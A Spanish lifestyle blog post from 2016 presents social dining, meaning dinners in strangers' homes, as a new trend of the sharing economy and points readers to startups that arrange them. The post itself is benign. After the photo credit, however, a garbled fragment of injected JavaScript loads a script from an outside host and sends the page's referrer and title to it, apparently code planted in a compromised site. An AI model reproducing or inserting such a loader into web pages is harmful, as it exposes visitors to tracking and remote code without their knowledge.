Cenas en domicilio

25/02/2016

Una cena curata nel minimo dettaglio.

En estos tiempos que corren todo fluye y todo cambia. Nada es lo que era y nada será lo que parece. Salir a cenar fuera también empieza a coger un nuevo ritmo, con aires tan novedosos como, a priori, chocantes. Primero fueron Airbnb y BlaBlaCar. Ahora le toca el turno a esta modalidad de cenas que se adapta a las nuevas necesidades y a los nuevos gustos que rondan ya por todo el planeta.

¿Te apetece salir a cenar fuera pero no tienes con quién? ¿Te apetece salir pero al mismo tiempo te gustaría catar comida cien por cien casera? ¿Te apetece salir pero tu bolsillo está resentido y no puedes permitírtelo? Te damos la solución a las tres cuestiones: las cenas en domicilio, traducción literal, del nuevo concepto cada vez más de moda, social dining.

Las cenas en domicilio no son otra cosa que ir a cenar a casa de un desconocido y compartir mesa con más desconocidos. Suena a risa pero no lo es. Suena a poco apetecible pero tampoco lo es. Lo creáis o no son muchos los defensores -e incluso apasionados- de esta nueva tendencia social-gastronómica. Entre otras cosas, porque la situación económica en líneas generales no está para tirar cohetes. El invento de «la economía colaborativa» es todo un bombazo y apunta maneras de empezar a surgir en muchos más ámbitos de nuestras vidas.

Tal vez al leer estas líneas muchos os estéis planteando dos cosas: a) disfrutar de una cena de este tipo o b) organizar y preparar una cena de este tipo. Os facilitamos el asunto para hacerlo. Contactad con VizEat,  Social Eaters o VoulezVousDiner. Son startup ansiosas de triunfar que te ayudarán a sumergirte en el mundillo, garantizándote una serie de cosas básicas. Parece que quien ha participado ya en este tipo de cenas repite. Califica la experiencia como enriquecedora, interesante y agradable. Y lo mejor de todo, a precios módicos que casi casi cualquier bolsillo podría permitirse.

¿Probamos? 🙂

Foto | emanuele tagliaferris.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;